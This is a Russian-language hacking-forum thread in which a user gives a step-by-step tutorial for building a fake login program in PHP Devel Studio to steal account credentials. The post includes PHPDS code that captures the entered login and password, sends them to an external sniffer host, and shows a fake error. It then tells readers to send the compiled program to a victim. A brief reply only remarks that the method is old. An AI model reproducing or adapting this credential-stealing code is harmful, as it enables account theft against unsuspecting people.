Фейк программа на PHP

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

NitezBenq

Участник

NitezBenq

Участник
24 Июн 2016
2
0
И так для тех кто не умеет или никогда не пробовал . Расскажу вам о одном из популярных способов кражи аккаунтов от сервисом,игр и прочих целей . И так для этого нам понадобится программа PHP Devel Studio .

Рисуем в программе вид фейка (Картинки,фон ) Добавляем два поля
1.Логин
2.Пароль

И добавляем одну кнопку назовем ее "Авторизироваться"

В данную кнопку вставляем (Событие->клик) В открывшемся окне вводим PHPDS код :

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "Вставте прямую ссылку на картинку «Hello World» (Есть в настройках профиля на сниффере)";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Ошибочка вышла :(", "Ошибочка вышла :()");

Регистрируемся на сниффере , я использую свой sniffer.poigraem.uz . Захожу в профиль перехожу через меню вверху в раздел "Настройки " и видим там несколько вариантов отсылки данных на сниффер . Нам нужен вариант
"Прямая ссылка на картинку «Hello World» "
У меня эта ссылка выглядит вот так .
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Теперь берем вышеуказанный код и подставляем нужную нам ссылку в переменную $url

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Ошибочка вышла :(", "Ошибочка вышла :()");

Компилируем нашу программу нажатием Зеленой кнопки Play вверху панели PHP Devel Studio , и кидаем жертве . Теперь когда она введет туда свои данных мне на сниффер придет вот такая строка :

snif=kaylos&Login=Логин которая ввела жертва | Pass=пароль который ввела жертва

Способ довольно старый и уже сто раз переделаеный но как показывает время , данный способ все еще рабочий . Удачи в использовании..
 

mr. robot

Участник

mr. robot

Участник
30 Май 2016
95
46
я не знаю где ты это вырыл, но я видел этот мануал года 2-3 назад.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя